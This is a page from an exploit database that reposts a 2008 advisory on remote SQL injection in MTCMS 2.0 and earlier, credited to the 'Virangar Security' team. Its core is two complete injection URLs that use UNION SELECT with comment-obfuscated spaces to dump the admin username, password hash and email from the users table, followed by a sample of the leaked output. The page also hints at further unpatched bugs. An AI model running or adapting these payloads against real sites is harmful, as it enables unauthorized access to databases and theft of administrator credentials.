[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MTCMS <= 2.0 Remote SQL Injection Vulnerabilities

Author
Virangar Security
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2476
Category
web applications
Date add
10-01-2008
Platform
unsorted
=================================================
MTCMS <= 2.0 Remote SQL Injection Vulnerabilities
=================================================




#######################################################################
#                                                                     #
#    ...:::::MTCMS <=2.0  SQL Injection Vulnerbility ::::....         #           
#######################################################################

Virangar Security Team

--------
Discoverd By :hadihadi

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004
----------
vules:
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*

-------------------------------------
you can see some thing similar to:
#admin_35a6e23edefc651ef0380b277ce5d709#
Admin@service.com
-------------------------------------
MTCMS contains of other bugs in other pages ;)
& maybe other versions have Vulnerbility too :)



#  0day.today [2024-09-28]  #